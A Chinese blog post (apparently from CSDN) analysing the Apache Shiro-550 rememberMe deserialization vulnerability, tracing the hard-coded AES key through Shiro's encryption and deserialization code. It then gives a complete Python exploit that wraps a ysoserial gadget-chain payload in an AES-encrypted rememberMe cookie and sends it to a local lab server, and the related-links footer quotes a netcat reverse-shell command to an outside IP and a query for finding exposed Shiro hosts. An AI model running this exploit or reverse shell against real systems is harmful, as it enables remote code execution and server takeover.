Apache Shiro-550反序列化漏洞分析

最新推荐文章于 2023-04-16 13:09:45 发布
最新推荐文章于 2023-04-16 13:09:45 发布
阅读量542 收藏
点赞数
文章标签: apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61991235/article/details/126810520
版权

Apache Shiro-550反序列化漏洞分析

CVE-2016-4437

漏洞成因

  • 通过在cookie的rememberMe字段中插入恶意payload,

  • 触发shiro框架的rememberMe的反序列化功能,导致任意代码执行。

  • shiro 1.2.24中,提供了硬编码的AES密钥:kPH+bIxk5D2deZiIxcaaaA==

  • 由于开发人员未修改AES密钥而直接使用Shiro框架,导致了该问题

漏洞分析

加密过程

从硬编码开始入手,在shiro/mgt/AbstractRememberMeManager.class中找到key

 private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");

可以看到

AbstractRememberMeManager implements RememberMeManager

向上回溯,找到RememberMeManager中的onSuccessfulLogin方法(登录成功的处理)

void onSuccessfulLogin(Subject subject, AuthenticationToken token, AuthenticationInfo info);

在此处打下断点,然后debug。开启环境后登录,记得要勾选Remember Me

 

成功接收数据。

跟进forgetIdentity,该方法是处理requestreponse请求

 继续跟进forgetIdentity

进入getCookie的removeFrom()方法

 这里获取配置信息,最后用addCookieHeader放到返回包中的Cookie里。其中就有我们熟悉的,deleteMe字段和rememberMe字段,也就是我们指纹识别最简单的两种方法的原理

这一阶段过后就回到了onSuccessfulLogin

 其中的isRemeberMe(token)用于检查是否勾选了remember me

跟进rememberIdentity,其中的authcInfo是用户名信息root

继续跟进rememberIdentity

 发现其中存在一个转化bytes的方法convertPrincipalsToBytes转化对象是subject, authcInfo,其中包含主机名,用户名等信息

进入convertPrincipalsToBytes。发现其序列化了传进去的用户名root

 

跟进encrypt方法。

 

其中的CipherService cipherService = this.getCipherService()是获取密码服务的意思。而且可以发现是AES加密,且为AES/CBC/PKCS5Padding

 

再看这句。其中的getEncryptionCipherKey(),明显是获取密钥,

ByteSource byteSource = cipherService.encrypt(serialized, this.getEncryptionCipherKey());

跟进getEncryptionCipherKey(),这个找key

最终溯源到 getEncryptionCipherKey 就是开头中的 DEFAULT_CIPHER_KEY_BYTES,也就是我们一开始第一个提到的kPH+bIxk5D2deZiIxcaaaA==这个key

随后就传入 encrypt函数,接下来就是加密方法了

 加密后数据一直向上回溯,直到 rememberIdentity这个方法下有个 rememberSerializedIdentity方法要更进,因为这个是记住序列化身份的功能

 跟进rememberSerializedIdentity,该方法的作用是将加密的数据base64编码后加到Cookie

 

解密过程

切入点,从获取到客户端数据开始分析,即org.apache.shiro.mgt.AbstractRememberMeManager类的getRememberedPrincipals方法开始。打上断点,在页面随便刷新一下即可触发此方法 。有些文章说的是随便刷新一下,但是根据测试发现直接刷新是抓不到的。必须Cookie中的JSESSIONID删掉删掉

 

跟进其中的getRememberedSerializedIdentity()方法。其中调用了一个this.getCookie().readValue(request, response)。里面包含了要读取的Cookie数据。

 

跟进readValue 方法,根据 Cookie 中的 name 字段(这个字段就是 rememberMe)获取 Cookie 的值。最终把获取cookie里面的rememberme 给到 value 返回上一级函数

 

回到getRememberedSerializedIdentity中后再将得到的数据进行base64解密,得到结果后继续向上传递

 

 

再次回到AbstractRememberMeManager后就跟进到convertBytesToPrincipals方法

进入其中的decrypt()方法,此方法对数据进行了解密

 其中的getCipherService()和上面加密那一样,都用于获取加密方法AES/CBC/PKCS5Padding

 最后到这句话,获取老朋友AES的秘钥 getDecryptionCipherKey()后,带着秘文和AES公钥进入decrypt函数

 ByteSource byteSource = cipherService.decrypt(encrypted, getDecryptionCipherKey());

跟进到CipherServicedecrypt方法,再进入其中的decrypt

 最后到JcaCipherService 中的 crypt完成解密操作

 

反序列化操作

解密完成后就向上return,直到AbstractRememberMeManager#decrypt可看到 r00 开头 序列化的数据

 

再次return,看到deserialize 反序列化的方法。

 跟进到DefaultSerializerdeserialize方法,可发现readObject()方法完成反序列化操作。假如我们拿到了Key,并且有该站点的反序列化利用链,便可对其进行反序列化攻击。至此,漏洞原理部分结束

利用

import base64
import sys
import uuid
import subprocess
​
import requests
from Crypto.Cipher import AES
​
​
def encode_rememberme(command):
    # 这里使用CommonsCollections2模块
    popen = subprocess.Popen(['java', '-jar', 'E:\java_file\Java_chain\ysoserial-master\ysoserial-master\\target\ysoserial-0.0.6-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
​
    # 明文需要按一定长度对齐,叫做块大小BlockSize 这个块大小是 block_size = 16 字节
    BS = AES.block_size
​
    # 按照加密规则按一定长度对齐,如果不够要要做填充对齐
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
​
    # 泄露的key
    key = "kPH+bIxk5D2deZiIxcaaaA=="
​
    # AES的CBC加密模式
    mode = AES.MODE_CBC
​
    # 使用uuid4基于随机数模块生成16字节的 iv向量
    iv = uuid.uuid4().bytes
​
    # 实例化一个加密方式为上述的对象
    encryptor = AES.new(base64.b64decode(key), mode, iv)
​
    # 用pad函数去处理yso的命令输出,生成的序列化数据
    file_body = pad(popen.stdout.read())
​
    # iv 与 (序列化的AES加密后的数据)拼接, 最终输出生成rememberMe参数
    base64_rememberMe_value = base64.b64encode(iv + encryptor.encrypt(file_body))
​
    return base64_rememberMe_value
​
​
def dnslog(command):
    popen = subprocess.Popen(['java', '-jar', 'E:\java_file\Java_chain\ysoserial-master\ysoserial-master\\target\ysoserial-0.0.6-SNAPSHOT-all.jar', 'URLDNS', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_rememberMe_value = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_rememberMe_value
​
​
if __name__ == '__main__':
    # cc2的exp
    payload = encode_rememberme('calc.exe')
    print("rememberMe={}".format(payload.decode()))
​
    # dnslog的poc
    #print("rememberMe={}".format(payload1.decode()))
​
    cookie = {
        "rememberMe": payload.decode(),
        " JSESSIONID":"43CA55C35CD6D685F2A4571B1F679742",
        "Phpstorm-3d76da0a":"b4b99549-b744-429d-832f-2197b3a9d510"
    }
​
    requests.get(url="http://127.0.0.1:8081/samples_web_1_2_4_war/", cookies=cookie)

 

踩坑

  • 导入cc4

第一次使用tomcat搭建环境,不知道cc4.0依赖要添加到tomcat中,以为maven导入就可以了。弄了好久都没弄出来,找师傅帮忙才发现问题

参考

K4i_x3i0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
qq_46416934的博客
09-01 1154
系统将密钥硬编码在代码里,且在官方文档中并没有强调修改该密钥,导致框架使用者大多数都使用了默认密钥。检测漏洞ShiroConfig.java 是否包含 fCq+/xW488hMTCD+cmJ3aQ==,如果是使用的默认密钥则需要修改,防止被执行命令攻击。升级版本到 >=v.4.3.1(其实就是升级Shiro版本到1.7),并且重新生成一个新的秘钥替换cipherKey,保证唯一且不要泄漏。升级Shiro版本到 >=1.7,在调用的地方重新生成一个新的秘钥替换。都存在漏洞建议升级到shiro1.7版本。..
Apache Shiro-RememberMe 反序列化漏洞
chaojixiaojingang
08-21 6177
1.资产查找 Fofa: app="Apache-Shiro" 2.影响版本 Apache Shiro <= 1.2.4 3.漏洞描述 Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。可造成远程命令执行,完全控制服务器权限。 目前已经出..
漏洞复现】Apache系列(一)之Shiro漏洞复现
qq_45244158的博客
02-23 4857
Apache Shiro550反序列化(CVE-2016-4437)漏洞 Apache Shiro 认证绕过漏洞(CVE-2020-1957) 漏洞
分享一下修复项目漏洞步骤
IT_master8888的博客
02-06 3174
项目漏洞修复步骤: Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞 <shiro.version>1.6.0</shiro.version> 检测到目标站点存在javascript框架库漏洞 jquery-3.5.1.js 检测到目标主机可能存在缓慢的HTTP拒绝服务攻击 设置Tomcat / server.xml文件 connectiontimeout 值,默认为20000ms,修改为8000ms(Tomcat 自身安全漏洞) A...
实现shiro-remember功能
m0_67393295的博客
04-28 354
首先说一下rememberMe是什么, 通俗的说就是 你登录百度以后,选择记住我,关闭浏览器之后打开百度,发现你还是登录状态,这样就是RememberMe 在这里,我们假设已经实现了shiro的基本登录功能。 首先是页面 userName<input type="text"id="userName" name="userName"value="<shiro:principal/>" /><br/> password:<input type="text" id="pa
Shiro反序列化漏洞综合
FODKING的博客
09-07 864
Apache Shiro框架提供了记住我的功能(RememberMe),在服务器上存在反序列化漏洞
Shiro反序列化漏洞检测工具
01-05
Apache Shiro是一款强大的Java安全框架,它为...通过了解Shiro反序列化漏洞的原理和防范措施,我们可以更好地保护我们的系统免受此类攻击。同时,使用提供的检测工具进行定期扫描,也能及时发现并修复潜在的安全隐患。
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro-EXP:Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存马
05-26
项目介绍基于Apache Shiro反序列化漏洞进行利用链的探测,附内存马。利用时需要修改POST请求两处数据,分别为Header头RememberMe字段值和携带的data数据(由于payload设定,data中须指定名字为c的参数值)。探测到...
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
Apache shiro1.2.4反序列化漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次...
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具.zip
最新发布
12-23
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则...
Shiro反序列化漏洞Shiro版本升级资源
06-22
从上面我们了解到,反序列化漏洞主要是由于硬编码引起的,那么只要解决硬编码,就解决了该漏洞。解决硬编码主要有两种方式: 方法一:自行实现key值 方法二:升级到1.2.5版本或以上 那么在我的项目中,选择的是升级...
shiro反序列化漏洞检测工具,含链接教程
08-17
该压缩包文件包含的`shiro_tool.jar`很可能是一个专门用于检测Apache Shiro反序列化漏洞的工具。使用方法如描述所示,通过命令行输入`java -jar shiro_tool.jar`后跟目标服务器的URL,工具会尝试识别并测试该服务器...
Shiro_exploit:Apache Shiro Java反序列化漏洞分析和利用
03-10
Apache Shiro Java反序列化进攻分析及利用0x00项目地址0x01概述两者天被派去去护网&重保,态势感知报告了一条冰蝎的远程代码执行的纠正,在通过日志以及webshel​​l及相关信息,红队大概是通过shiro反序列化拿到...
apache shiro 反序列化漏洞解决方案
qq_36407469的博客
07-27 5148
一、反序列化漏洞介绍 序列化:把对象转换为字符串或者字节流的过程。 反序列化:把字符串或者字节流恢复为对象的过程。 反序列化漏洞的产生原理,即黑客通过构造恶意的序列化数据,从而控制应用在反序列化过程中需要调用的类方法,最终实现任意方法调用。如果在这些方法中有命令执行的方法,黑客就可以在服务器上执行任意的命令。 二、产生原因 shiro提供了记住我(RememberMe)的功能,即可以在关闭浏览器的情况下,下次打开时还能记住你是谁,无需登录即可访问。 shiro默认使用了CookieRememberMeMa
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理和漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
Apache Shiro系列漏洞利用以及实战总结
热门推荐
jammny
10-14 1万+
前言: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。内置了可以连接大量安全数据源(又名目录)的Realm,如LDAP、关系数据库(JDBC)、类似INI的文本配置资源以及属性文件等。 目录 RememberMe RCE-550(CVE-2016-4437) 远程安全限制绕过漏洞(CVE-2016-6802) Padding Orac
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721)
小宇的web博客
02-05 6968
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721) Shiro简介 Apache Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。 Apache Shiro反序列化漏洞分为两种:Shiro-550Shiro-721 Shiro-550反序列漏洞 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对reme
shiro-550反序列化漏洞shiro-721反序列化漏洞的区别
04-13
这是一个技术问题,Shiro-550漏洞Shiro-721漏洞都是Apache Shiro框架中的反序列化漏洞,但Shiro-550漏洞主要是由于使用了不安全的Java反序列化进行身份验证,而Shiro-721漏洞主要是由于Shiro的rememberMe功能中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值